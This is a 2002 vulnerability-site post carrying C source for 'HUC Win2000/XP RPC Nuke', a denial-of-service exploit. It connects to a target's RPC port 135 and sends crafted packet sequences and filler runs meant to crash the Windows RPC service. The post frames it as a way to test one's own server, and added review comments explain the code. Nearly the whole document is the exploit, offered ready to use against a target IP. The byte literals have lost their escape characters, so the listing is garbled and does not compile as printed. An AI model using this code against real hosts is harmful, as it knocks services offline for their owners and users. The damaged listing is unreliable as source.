 Windows RPC DoS Exploit Code (from SPIKE to C)
Category: Vulnerability
Posted: 2002-11-18 by ReCall
Views: 562
Source: Click here
 
 Details
<b>Summary</b>

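The following exploit code will allow you to test your server for the <a href="http://www.securiteam.com/windowsntfocus/6G00B2K5PM.html" target="_blank">Windows RPC DoS</a> vulnerability noted in our previous article: Windows RPC Service DoS (SPIKE). The code only sends the packets and does not check the result, so verify the state of the RPC service on the tested server afterwards.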



<b> Details</b>

Exploit:





/*

************************************************************************

* MS WIN RPC DoS CODE FROM SPIKE v2.7

*

* Compile with:

* cl winnuke.c

*

* Usage:

* winnuke targetip

*

* Code by lion, Welcome to HUC Website Http://www.cnhonker.com

* 2002/10/22

************************************************************************

*/



#include <winsock2.h>

#include <stdio.h>



#pragma comment(lib, "ws2_32.lib")



/*
 * Fixed byte sequences that main() sends to the target in numeric order
 * (sendcode1 .. sendcode8), each followed by a run of filler bytes.
 * main() passes sizeof(...)-1 as the length, so the terminating NUL of each
 * literal is not transmitted.
 * Per the file header these were taken from SPIKE v2.7; what each sequence
 * means at the protocol level is not stated in this listing.
 * NOTE(review): as printed, the literals hold the plain characters x, digit,
 * digit with no escape prefix, which looks like extraction damage on this
 * page; treat the listing as a damaged copy of the original source.
 */
char sendcode1[] =

"x05x00x0bx03x10x00x00x00x48x00x00x00x02x00x00x00"

"xd0x16xd0x16x00x00x00x00x01x00x00x00x00x00x01x00"

"x60x9exe7xb9x52x3dxcex11xaaxa1x00x00x69x01x29x3f"

"x02x00x02x00x04x5dx88x8axebx1cxc9x11x9fxe8x08x00"

"x2bx10x48x60x02x00x00x00x05x00x00x01x10x00x00x00"

"xd0x16x00x00x8fx00x00x00x20x27x01x00x00x00x02x00"

"xf0x00x00x00x00x00x00x00xf0x00x00x00";



/* Sent after the first 240-byte filler run. */
char sendcode2[] =

"x88x13x00x00x00x00x00x00x88x13x00x00";



/* Sent after the first 5000-byte filler run. */
char sendcode3[] =

"xffxffxffxffxffxffxffxffx00x00x00x00x00x00x00x00"

"x00x00x00x00x00x02x00x00x00x00x00x00x00x02x00x00";



/* Sent after the 512-byte filler run. */
char sendcode4[] =

"xfexffx00x00x00x00x00x00xfexffx00x00x3dx3dx3dx3d"

"x3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3d"

"x05x00x00x00x10x00x00x00xd0x16x00x00x8fx00x00x00"

"x50x10x01x00x00x00x02x00";



/* sendcode5 .. sendcode8 are each sent after a further 5000-byte filler run. */
char sendcode5[] =

"x05x00x00x00x10x00x00x00xd0x16x00x00x8fx00x00x00"

"x80xf9x00x00x00x00x02x00";



char sendcode6[] =

"x05x00x00x00x10x00x00x00xd0x16x00x00x8fx00x00x00"

"xb0xe2x00x00x00x00x02x00";



char sendcode7[] =

"x05x00x00x02x10x00x00x00x60x15x00x00x8fx00x00x00"

"x60x15x00x00x00x00x02x00";



char sendcode8[] =

"x00x00x01x10x00x00x00x00x00x00x01x10x00x00";



/*
 * Entry point: connects to one host over TCP and writes the sendcode1..8
 * sequences, each followed by a run of a single repeated filler byte.
 *
 * argv[1]  target host name or address (resolved with gethostbyname)
 * argv[2]  optional TCP port, default 135
 * argv[3]  optional value parsed into bufsize, which is never used afterwards
 *
 * Returns 0 after the last send; returns -1 when WSAStartup reports a
 * negative value; calls exit(1) on usage, socket, resolve, connect or
 * first-send failure.
 *
 * What this shows a defender: the tool needs a completed TCP connection to
 * the target port, so a host whose RPC port is not reachable from the sender
 * is not touched by it. On the wire the traffic is a handful of short fixed
 * sequences separated by long runs (240, 5000, 512, then 5000 bytes each) of
 * one repeated byte value.
 *
 * NOTE(review): several string literals below are split across lines and the
 * fill values are written as multi-character constants; this looks like
 * escape sequences lost in page extraction, so the listing as printed is a
 * damaged copy and does not compile as C.
 */
int main(int argc, char *argv[])

{

WSADATA wsaData;

WORD wVersionRequested;

struct hostent *pTarget;

struct sockaddr_in sock;

char *targetip;

int port,bufsize;

SOCKET s;

/* Scratch buffer for the filler runs; the largest live fill is 5000 bytes. */
char buffer[20480];



/* Banner. */
printf("========================= HUC Win2000/XP RPC Nuke V0.10 =======================
");

printf("================= By Lion, Welcome to http://www.cnhonker.com =================

");



/* Without a target argument, print usage and stop. */
if (argc < 2)

{

printf("Usage:
");

printf(" %s <TargetIP> [TargetPort]
", argv[0]);

printf("Example:
");

printf(" %s 192.168.0.1
", argv[0]);

printf(" %s 192.168.0.1 135
", argv[0]);

printf("PS:
");

printf(" If target is XP, try 2 times.
");

exit(1);

}



/* Request Winsock 1.1; startup is treated as failed only when negative. */
wVersionRequested = MAKEWORD(1, 1);

if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;



/* Defaults: port 135, bufsize 512; both can be overridden from argv. */
targetip = argv[1];

port = 135;

if (argc >= 3) port = atoi(argv[2]);

bufsize = 512;

if (argc >= 4) bufsize = atoi(argv[3]);



/* Plain TCP stream socket. */
s = socket(AF_INET, SOCK_STREAM, 0);

if(s==INVALID_SOCKET)

{

printf("Socket error!
");

exit(1);

}



printf("Resolving Hostnames...
");

if ((pTarget = gethostbyname(targetip)) == NULL)

{

printf("Resolve of %s failed, please try again.
", argv[1]);

exit(1);

}



/* Only the address, family and port fields of sock are assigned here. */
memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);

sock.sin_family = AF_INET;

/* The int port is narrowed to USHORT before byte-order conversion. */
sock.sin_port = htons((USHORT)port);



printf("Connecting...
");

/* Any non-zero result from connect ends the run before data is sent. */
if ( (connect(s, (struct sockaddr *)&sock, sizeof (sock) )))

{

printf("Couldn't connect to host.
");

exit(1);

}



printf("Connected!...
");

printf("Sending Packets...
");

/* This is the only send whose result is checked; later sends are not. */
if (send(s, sendcode1, sizeof(sendcode1)-1, 0) == -1)

{

printf("Error sending nuke Packets
");

closesocket(s);

exit(1);

}



/* From here on: fill part of buffer with one value, send it, then send the next fixed sequence. */
memset(&buffer, 'x41', 240);

send(s, buffer, 240, 0);



send(s, sendcode2, sizeof(sendcode2)-1, 0);

memset(&buffer, 'x42', 5000);

send(s, buffer, 5000, 0);



send(s, sendcode3, sizeof(sendcode3)-1, 0);

memset(&buffer, 'x43', 512);

send(s, buffer, 512, 0);



send(s, sendcode4, sizeof(sendcode4)-1, 0);

// Disabled alternative: one fill and send of the whole 20480-byte buffer.
// memset(&buffer, 'x44', 20480);

// send(s, buffer, 20480, 0);



// The next line and its counterpart further down look like block-comment
// markers but are themselves line comments, so the code between them is live.
// /*

memset(&buffer, 'x44', 5000);

send(s, buffer, 5000, 0);



send(s, sendcode5, sizeof(sendcode5)-1, 0);

memset(&buffer, 'x45', 5000);

send(s, buffer, 5000, 0);



send(s, sendcode6, sizeof(sendcode6)-1, 0);

memset(&buffer, 'x46', 5000);

send(s, buffer, 5000, 0);



send(s, sendcode7, sizeof(sendcode7)-1, 0);

memset(&buffer, 'x47', 5000);

send(s, buffer, 5000, 0);



send(s, sendcode8, sizeof(sendcode8)-1, 0);

memset(&buffer, 'x48', 5000);

send(s, buffer, 5000, 0);



// */

/* Printed unconditionally: nothing is read back from the target, so this message is not evidence of any effect on the service. */
printf("Nuked!
If target is XP, try a again! :)
");

closesocket(s);

WSACleanup();

return 0;

}
 